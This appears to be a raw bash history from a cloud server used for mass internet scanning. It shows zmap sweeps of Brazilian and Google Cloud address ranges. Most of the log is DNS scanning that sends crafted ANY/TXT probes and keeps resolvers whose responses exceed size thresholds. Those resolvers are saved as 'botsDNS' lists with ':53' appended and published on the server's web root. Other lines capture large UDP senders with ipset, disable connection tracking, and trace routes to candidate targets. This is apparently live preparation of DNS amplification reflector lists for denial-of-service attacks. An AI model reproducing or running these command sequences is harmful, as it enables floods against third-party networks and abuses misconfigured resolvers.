htop screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa.py hytop htop screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 ls screen python3 aa2.py screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 screen -ls nano aa.py htop ls cat aa cat aa.py screen -ls nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py nano aa2.py python3 aa2.py screen python3 aa2.py htop ps -aux | grep pyth screne -r screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py screen python3 aa2.py htop screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r pts-1.ubuntu-c-4-intel-nyc3-01 ls cat aa2.py ls nano aa2.py screen python3 aa2.py htop history screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen python3 aa2.py ls cat br_tcp.txt | less ls rm -rf br_tcp.txt ls -la screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa2.py screen -ls screen python3 aa2.py history | grep zmap ls history | grep br zmap ls wget https://www.ipdeny.com/ipblocks/data/aggregated/br-aggregated.zone ls history | grep zmap zmap -w br-aggregated.zone -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all.txt cat all.txt | less screen zmap -w br-aggregated.zone -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_443.txt screen zmap -w br-aggregated.zone -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_443.txt -B 1G hf mt -l screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 htop screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 history screen -ls screen zmap -w br-aggregated.zone -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_80.txt -B 1G screen -ls rm -rf all.txt ls ls -la cat all_443.txt | less cat all_443.txt | tr ',' ':' | less cat all_443.txt | tr ',' ':' > all_443_filtered.txt ls cat all_443_filtered.txt | less ls cat all_80.txt | tr ',' ':' > all_80_filtered.txt ls -la rm -rf all_443.txt rm -rf all_80.txt ls ls -la cat all_443_filtered.txt all_80_filtered.txt > all_tcp.txt ls -la wc -l all_tcp.txt du -sh all_tcp.txt screen -ls nano aa2.py screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 ls cat all_tcp.txt | less cp all_tcp.txt /var/www/html/ cp all_tcp.txt /usr/share/nginx/html/ ifconfig nano aa2.py cat aa2.py ls ./traf ls nano aa2.py cat aa2.py ls -la /var/www/html/ cat /var/www/html/dns_global.txt | less ls -la /usr/share/nginx/q ls -la /usr/share/nginx/ ls -la /usr/share/nginx/html/ ls cat dns_any.ini cat dns_txt.ini ls ls -la cat results_any.txt | less cat results_any.txt | awk '{print $1}' | less cat results_any.txt | awk '{print $1}' > /var/www/html/dns_any.ini cat results_txt.txt | awk '{print $1}' > /var/www/html/dns_txt.ini ls -la ifconfig ls -la /var/www/html/ ls -la dig adobe.com dig adobe.com TXT dig adobe.com ANY ls cat results_txt.txt | less cat results_txt.txt | awk '$2 > 3000' | less cat results_txt.txt | awk '$2 > 3000' ls cat subnet.py p cat subnet.py ls rm -rf subnet.py ls cat aa.py rm -rf aa.py ls cat aaaaa.py ls cat parser.py ls nano parser.py python3 parser.py ps -aux htop ls nano parser.py screen python3 parser.py htop screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 nano parser.py screen python3 parser.py top htop screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 ls -la screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 htop screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 ls screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 htop screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 ls screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 nano aa2.py nano aa3.py screen python3 aa3.py cat .ssh/authorized_keys cat .ssh/id_rsa.pub screen python3 aa3.py nano aa33 nano aa3.py screen -ls screen -r 1323532.pts-2.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen -ls screen -r 1323532.pts-2.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen -S aa3 htop screen -ls screen -r 1323348.pts-2.ubuntu-c-4-intel-nyc3-01 python3 aa34 python3 aa3.py screen -ls exit nano aa21' nano aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa2.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa2.py htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa2.py screen python3 aa2.py htop screen -ls screen -r 1323348.pts-2.ubuntu-c-4-intel-nyc3-01 htop screen -ls screen -r 1323905.aa3 screen -ls screen -r pts-2.ubuntu-c-4-intel-nyc3-01 ls wc -l results_any.txt cat results_txt.txt ls cat results_txt.txt | less cat results_txt.txt | awk '$2 > 10000' | less cat results_txt.txt | awk '$2 > 10000' | wc -l cat results_txt.txt | awk '$2 > 6000' | wc -l cat results_txt.txt | awk '$2 > 4000' | wc -l cat results_any.txt | awk '$2 > 4000' | wc -l ls cp dns_any.ini /var/www/html/ cp dns_any.ini /usr/share/nginx/html/ cp dns_txt.ini /var/www/html/ cp dns_txt.ini /usr/share/nginx/html/ ls cp results_any.txt /usr/share/nginx/html/ cp results_*.txt /usr/share/nginx/html/ cp results_*.txt /var/www/html/ ifconfig ls -la rm -rf all_443_filtered.txt rm -rf all_80_filtered.txt ls -la cat dns_global.txt | less ls -la du -sh * cat dns_global.txt | less cat dns_global.txt | tr ',' ' ' | awk {'print $1'} > dns_global2.txt cat dns_global2.txt | less history | grep zmap zmap -w dns_global2.txt -M udp -p 53 --probe-args=file:adobe.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o dns_global.txt -B 20M zmap -w dns_global2.txt -M udp -p 53 --probe-args=file:adobe.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o dns_global.txt -B 20M wc -l dns_global wc -l dns_global.txt cat dns_global| less cat dns_global.txt | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 2000' | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 2000' | wc -l cat dns_global.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l cat dns_global.txt | tr ',' ' ' | awk '$2 > 1000' | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} > final_dns.txt cat final_dns.txt | less cp final_dns.txt /var/www/html/ cp final_dns.txt /usr/share/nginx/html/ ifconfig cat dns_global.txt | tr ',' ':' | awk '$2 > 1000' | awk {'print $1'} | less cat dns_global.txt | tr ',' ':' | awk '$2 > 1000' | awk {'print $1'} cat dns_global.txt | less cat dns_global.txt | tr ',' ':' | less cat dns_global.txt | less cat dns_global2.txt | less cat dns_global.txt | less ls history | grep zmap zmap -w dns_global2.txt -M udp -p 53 --probe-args=file:adobe.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o dns_global.txt -B 20M wc -l dns_global.txt cat dns_global.txt | tr zmap -w dns_global2.txt -M udp -p 53 --probe-args=file:adobe.com.pkt --output-module=csv --output-fields=saddr,sport,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o dns_global.txt -B 50M cat dns_global.txt | less cat dns_global.txt | tr ',' ':' | less zmap -w dns_global2.txt -M udp -p 53 --probe-args=file:adobe.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o dns_global.txt -B 50M cat dns_global.txt | less cat dns_global.txt | tr ',' ' ' | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 500' | less cat dns_global.txt | tr ',' ' ' | awk '$2 > 500' | awk {'print $1' ":"'} cat dns_global.txt | tr ',' ' ' | awk '$2 > 500' | awk {'print $1 ":53"'} cat dns_global.txt | tr ',' ' ' | awk '$2 > 500' | awk {'print $1 ":53"'} > botsDNS.txt wc -l botsDNS.txt cp botsDNS.txt /var/www/html/ cp botsDNS.txt /usr/share/nginx/html/ ls ifconfig ls cat results_any.txt | less cat results_any.txt | awk '$2 > 5000' | less cat results_any.txt | awk '$2 > 5000' | awk {'print $1'} > /var/www/html/dns_any.ini cat results_any.txt | awk '$2 > 8000' | wc -l cat results_any.txt | awk '$2 > 8000' | less cat results_any.txt | awk '$2 > 6000' > cat results_any.txt | awk '$2 > 8000' | less cat results_any.txt | awk '$2 > 9000' | less cat results_any.txt | awk '$2 > 9000' | wc -l cat results_any.txt | awk '$2 > 9000' | awk {'print $1'} > /var/www/html/results_any.txt ifconfig cat /var/www/html/results_any.txt | less ls cat results_txt.txt | le cat results_txt.txt | less cat results_any.txt > /var/www/html/results_any.txt cat results_txt.txt > /var/www/html/results_txt.txt cat /var/www/html/results_any.txt | less ls -la cat parser.py ls python3 parser.py history ifconfig ls cat dns_any.ini | less cat results_any.txt | less cat results_any.txt | '$2 > 12000' | less cat results_any.txt | less cat results_any.txt | awk '$2 > 1000' | less cat results_any.txt | awk '$2 > 10000' | less cat results_any.txt | awk '$2 > 8000' | less cat results_any.txt | awk '$2 > 7000' | less cat results_any.txt | awk '$2 > 6000' | less cat results_txt.txt | less cat results_txt.txt | sort cat results_txt.txt | sort | less cat results_txt.txt | sort -nr | less cat results_txt.txt | awk '$2 > 10000' | sort -nr | less ls nano parser.py screen -ls screen python3 parser.py ls dig plasttekniknordic.com TXT dig plasttekniknordic.com ANY dig plasttekniknordic.com TXT ls rm -rf dns* ls python3 aaaaa.py nano aaaaa.py python3 aaaaa.py plasttekniknordic.com plasttekniknordic.com.pkt ls -la history | grep zmap screen zmap -M udp -p 53 --probe-args=file:plasttekniknordic.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS_1.txt -B 1G htop ls ls -la tail -f botsDNS_1.txt tail -f botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' ifconfig tcpdump -i eth0 -vvvnnn src port 53 -c1000 htop tcpdump -i eth0 -vvvnnn src port 53 -c1000 ls -la ls ls -la rm -rf botsDNS.txt cat final_dns.txt _ less ags [+], proto UDP (17), length 1500) ls -la cat final_dns.txt | less rm -rf final_dns.txt ls -la rm -rf delegated-lacnic-20250510 ls history wc -l botsDNS_1.txt wc -l botsDNS_1.txt | less cat botsDNS_1.txt | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l ifconfig cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | wc -l screen -ls cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} > /var/www/html/botsDNS.txt cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} > /usr/share/nginx/html/ cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} > /usr/share/nginx/html/botsDNS.txt ifconfig cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} | les cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1'} | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1' "" } | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1 "" '} | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1 ":" '} | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1 ":53" '} | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1 ":53" '} > /var/www/html/botsDNS.txt cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 1000' | awk {'print $1 ":53" '} > /usr/share/nginx/html/botsDNS.txt screen -ls ls ls -la cat results_any.txt nano parser.py cat parser.py ls ls -la nano parser.py ls -la nano parser.py screen python3 parser.py htop screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano parser.py screen python3 parser.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano parser.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 parser.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 history screen -ls ls nano aa2.py screen -ls screen python3 aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa2.py exit çs ls ls -la history | grep all_t cat all_tcp.txt | less rm -rf all_tcp.txt ls screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 çs ls history | grep zmap screen zmap -w br-aggregated.zone -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_443.txt -B 1G screen -ls screen zmap -w br-aggregated.zone -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_80.txt -B 1G screen -ls ls cat all_80.txt | less cat all_80.txt all_443.txt | less cat all_80.txt all_443.txt | less cat all_80.txt all_443.txt | tr ',' ':' | less cat all_80.txt all_443.txt | tr ',' ':' > all_tcp.txt wc -l all_tcp.txt ls cp all_tcp.txt /var/www/html/ cp all_tcp.txt /usr/share/nginx/html/ ls history | grep aa cat aa2.py ifconfig telnet route-server.he.net ls nano aa2.py screen -ls screen python3 aa2.py python3 aa2.py nano aa2.py python3 aa2.py ls -la /root/.ssh/ python3 aa2.py nano aa2.py screen python3 aa2.py python3 aa2.py nano aa2.py python3 aa2.py ls rm -rf aa2.py nano aa2.py screen python3 aa2.py nano aa2.py screen python3 aa2.py rm -rf aa2.py nano aa2.py screen python3 aa2.py python3 aa2.py screen python3 aa2.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py screen python3 aa2.py htphhtop htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py cat aa2.py nano aa2.py screen python3 aa2.py nano aa2.py screen python3 aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 exit w screen -ls screen -r 1922792.pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -rr nano aa2.py screen python3 aa2.py top htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 pip install py-radix screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py screen python3 aa2.py htop screen -los screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa2.py screen python3 aa2.py ls nano aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa2.py cat aa2.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa2.py nano aa3.py screen python3 aa3.py htop screen -0sl screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen python3 aa3.py htp htop nano aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen python3 aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen python3 aa3.py ls nano aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa3.py nano aa3.py screen python3 aa3.py htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 htop screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls cat aa3.py nano aa3.py screen python3 aa3.py htop screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ping 104.234.147.10 exit screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py w nano aa3.py cart aa3.py cat aa3.py screen -ls nano aa3.py screen python3 aa3.py nano aa3.py screen python3 aa3.py screen -ls scree n-r screen -r pts-0.ubuntu-c-4-intel-nyc3-01 no aa3.py nano aa3.py screen python3 aa3.py htop screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 nano aa3.py screen python3 aa3.py nano aa3.py screen python3 aa3.py nano aa3.py screen python3 aa3.py htop hjtop htop screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 htop ls screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano aa3.py screen python3 aa3.py ls rm -rf all_80.txt rm -rf all_443.txt history | grep zmap screen zmap -w br-aggregated.zone -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_443.txt -B 1G screen -ls wc -l all_443.txt screen zmap -w br-aggregated.zone -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_80.txt -B 1G screen -ls screen -r 3583 screen -r 3583737.pts-0.ubuntu-c-4-intel-nyc3-01 ls history | grep cat wc -l all_tcp.txt du -sh all_tcp.txt cp all_tcp.txt /var/www/html/ cp all_tcp.txt /usr/share/nginx/html/ ifconfig AS396982 bgpq3 bgpq4 bgpq3 apt install bgpq3 -y ls bgpq3 bgpq3 -4 -A -S RADB AS396982 bgpq3 -4 -A -S ARIN AS396982 bgpq3 -4 -A -S RADB AS396982 bgpq3 -4 -A -S RADB AS396982 | wc -l bgpq3 -4 -A -S ARIN AS396982 | wc -l bgpq3 -4 -A -S ARIN AS396982 bgpq3 -4 -A -S RADB AS396982 curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-east1") | .ipv4Prefix' apt-get install jq -y curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-east1") | .ipv4Prefix' curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-east1") | .ipv4Prefix' > googlecloud-ipv4.txt curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-west1") | .ipv4Prefix' >> googlecloud-ipv4.txt cat google cat googlecloud-ipv4.txt nano googlecloud-ipv4.txt history | grep zmap zmap -w googlecloud-ipv4.txt -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_443.txt -B 1G zmap -w googlecloud-ipv4.txt -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_80.txt -B 1G cat gcp_80.txt gcp_443.txt >> all_tcp.txt wc -l all_tcp.txt cat all_tcp.txt | less cat all_tcp.txt | grep 34. cat all_tcp.txt | grep 34.15 ls cat all_tcp.txt | tr ',' ':' | less cat all_tcp.txt | tr ',' ':' > all_tcp2.txt cat all_tcp2.txt | grep 34.15 | less cp all_tcp2.txt /var/www/html/all_tcp.txt cp all_tcp2.txt /usr/share/nginx/html/all_tcp.txt ifconfig mtr 179.127.153.1 mtr 131.100.167.1 mtr 131.100.167.2 mtr 177.72.15.1 screen -ls ls nano aa2.py nano aa3.py history | grep aa nano aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa3.py python3 aa3.py nano aa3.py python3 aa3.py screen python3 aa3.py htop cat aa3.py cat .ssh/id_rsa.pub history history | grep zmap dig any plasttekniknordic.com dig txt plasttekniknordic.com ipset apt install ipset -y nload history iptables -vnL ipset create dns_servers hash:ip ipset create udp_hosts hash:ip hashsize 131072 maxelem 1000000 iptables -A INPUT -p udp -m length --length 300:65535 -j SET --add-set udp_hosts src --exist iptables -vnL history | grep zmap screen zmap -M udp -p 53 --probe-args=file:plasttekniknordic.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS_1.txt -B 1G ls rm -rf all_* ls -la rm -rf gcp_443.txt rm -rf gcp_80.txt ps -aux htop ls iptables -vnL iptables -I OUTPUT -p icmp -j DROP iptables -vnL iptables -t raw -I PREROUTING -j NOTRACK iptables -I OUTPUT -j NOTRACK iptables -A OUTPUT -j NOTRACK iptables -vnL iptables -A OUTPUT -j NOTRACK iptables -t raw -vnl iptables -t raw -vnL iptables -t raw -I OUTPUT -j NOTRACK top htop screen -ls screen -r 140455.pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls wc -l botsDNS_1.txt iptables -vnL ipset list udp_hosts | wc -l ipset list udp_hosts | less wc -l botsDNS_1.txt cat botsDNS_1.txt | less cat botsDNS_1.txt | tr ',' ' ' | awk '$2 > 300' | wc -l history ipset list ipset list | wc -l ipset list | less ipset list > botsALL.txt nano botsALL.txt cat botsALL.txt | less ls cp botsALL.txt /var/www/html/ cp botsALL.txt /usr/share/nginx/html/ ifconfig screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 ls nano botsDNS_1.txt cat botsALL.txt | less ipset flush history | grep zmap zmap -M udp -p 53 --probe-args=file:plasttekniknordic.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS_1.txt -B 10M zmap -M udp -p 53 --probe-args=file:plasttekniknordic.com.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS_1.txt -B 10M -w botsALL.txt wc -l botsDNS_1.txt cat botsDNS_1.txt | less ipset list | less ipset list | wc -l cat botsDNS_1.txt | less ls nano parser.py screen python3 parser.py ls cat results_any.txt cat results_any.txt | awk '$2 > 6000' cat results_any.txt | awk '$2 > 6000' | awk {'print $1'} ls cat results_txt.txt | less cat results_txt.txt | awk '$2 > 6000' | awk {'print $1'} nano aa3.py screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen python3 aa3.py cat aa3.py ' cat aa3.py nano aa3.py screen python3 aa3.py nano aa3.py screen python3 aa3.py htop screen -ls screen -r 627298.pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r 625380.pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls nano aa3.py screen python3 aa3.py ls cat botsALL.txt | less wc -l botsALL.txt cat botsALL.txt | awk 'print $1 ":53"' | less cat botsALL.txt | awk 'print $1 ":53"' | l cat botsALL.txt | awk {'print $1 ":53"'} | less cat botsALL.txt | awk {'print $1 ":53"'} > /var/www/html/botsDNS.txt cat botsALL.txt | awk {'print $1 ":53"'} > /usr/share/nginx/botsDNS.txt ifconfig mtr 45.238.35.1 iptables -F OUTPUT mtr 45.238.35.1 mtr 143.0.156.1 screen -ls screen -r 627748.pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r 621261.pts-0.ubuntu-c-4-intel-nyc3-01 § screen -ls ls -la /var/www/html/ cat botsDNS_1.txt | less cat botsALL.txt | kless cat botsALL.txt | less ls history | grep bots cat /var/www/html/botsDNS.txt | less cat /usr/share/nginx/botsDNS.txt | less ifconfig nano aa3.py screen -ls screen -r 62 screen -r 627748.pts-0.ubuntu-c-4-intel-nyc3-01 ] nano aa3.py ls rm -rf *.txt ls history | grep googlecloud-ipv4 curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-west1") | .ipv4Prefix' >> googlecloud-ipv4.txt zmap -w googlecloud-ipv4.txt -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_443.txt -B 1G nano googlecloud-ipv4.txt zmap -w googlecloud-ipv4.txt -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_443.txt -B 1G zmap -w googlecloud-ipv4.txt -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_80.txt -B 1G ls cat gcp_* | wc -l cat gcp_443.txt | less curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-west1") | .ipv4Prefix curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-west1") | .ipv4Prefix' curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-west1") | .ipv4Prefix' >> googlecloud-ipv4.txt curl -s https://www.gstatic.com/ipranges/cloud.json | jq -r '.prefixes[] | select(.scope=="southamerica-east1") | .ipv4Prefix' >> googlecloud-ipv4.txt wc -l googlecloud-ipv4.txt nano googlecloud-ipv4.txt rm -rf gcp_80.txt rm -rf gcp_443.txt zmap -w googlecloud-ipv4.txt -p 80 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_80.txt -B 1G wc -l gcp_80.txt zmap -w googlecloud-ipv4.txt -p 443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o gcp_443.txt -B 1G cat gcp_443.txt | wc -l ls cat gcp_443.txt gcp_80.txt > gcp_br.txt ; rm -rf gcp_80.txt gcp_443.txt ls -al mkdir -p lists mv gcp_br.txt lists/ ls history | grep br sreen zmap -w br-aggregated.zone -p 80,443,22,53,487 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G screen zmap -w br-aggregated.zone -p 80,443,22,53,487 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G wc -l all_br.txt screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 wc -l all_br.txt du -sh all_br.txt screen zmap -w br-aggregated.zone -p 80-1024 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G tcpdump -i any -vvvnnn -c1000 screen -r pts-0.ubuntu-c-4-intel-nyc3-01 rm -rf all_br.txt screen zmap -w br-aggregated.zone -p 80,443,22,53,465,587,2000,8080,389,110,143,993,995,8291 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G ls wc -l all_br.txt | less du -sh all_br.txt ls cat all_br.txt | less wc -l all_br.txt | less screen -ls history ct all_br.txt | less cat all_br.txt | less cat all_br.txt | tr ',' ' ' | less cat all_br.txt | tr ',' ' ' | awk {'print $1'} | less cat all_br.txt | tr ',' ' ' | awk {'print $1'} > all_br2.txt rm -rf all_br.txt screen zmap -w all_br2.txt -p 80,443,22,53,465,587,2000,8080,389,110,143,993,995,8291 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 100M screen zmap -w all_br2.txt -p 80,443,22,53,465,587,2000,8080,389,110,143,993,995,8291 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 50M screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 screen zmap -w all_br2.txt -p 80,443,22,53,465,587,2000,8080,389,110,143,993,995,8291 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 100M screen -ls wc -l all_br.txt cat all_br.txt | less cat all_br.txt | tr ',' ' ' | less cat all_br.txt | tr ',' ':' | less cat all_br.txt | tr ',' ':' > all_br3.txt cat all_br3.txt | less cp all_br3.txt /var/www/html/all_tcp.txt cp all_br3.txt /usr/share/nginx/html/ ifconfig ls ls -la wc -l all_br.txt mtr 201.71.55.1 mtr 201.71.55.2 mtr 201.71.55.3 ping 201.71.55.3 mtr 187.44.161.1 telnet route-server.he.net mtr 187.44.161.1 htop mtr 187.44.161.1 lçs ls rm -rf all_br* history | grep zmap zmap -w br-aggregated.zone -p 80,443 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o all_br.txt -B 1G cat all_br.txt | less cat all_br.txt | tr ',' ':' | less cat all_br.txt | tr ',' ':' > /var/www/html/all_tcp.txt cat all_br.txt | tr ',' ':' > /usr/share/nginx/html/all_tcp.txt ifconfig mtr 45.160.228.1 mtr 45.160.228.2 mtr 189.51.32.1 mtr 45.160.228.2 mtr 189.51.32.1 htop mtr 189.51.32.1 dig vts.com ANY dig vts.com ANY @8.8.8.8 ls dig europa.eu ANY @8.8.8.8 ls ipset list ls nano aaaaa.py python3 aaaaa.py python3 aaaaa.py europa.eu europa.eu.pkt ls ipset list ipset flush ls history | grep 53 zmap -M udp -p 53 --probe-args=file:europa.eu.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G top ls screen zmap -M udp -p 53 --probe-args=file:europa.eu.pkt --output-module=csv --output-fields=saddr,udp_pkt_size --output-filter='success=1 && repeat=0' --no-header-row -o botsDNS.txt -B 1G htop iptables -vnL ipset list ipset list | wc -l top htop top htop iptables -vnl iptables -vnL ipset list | wc -l screen -ls screen -r pts-0.ubuntu-c-4-intel-nyc3-01 htop screen -ls 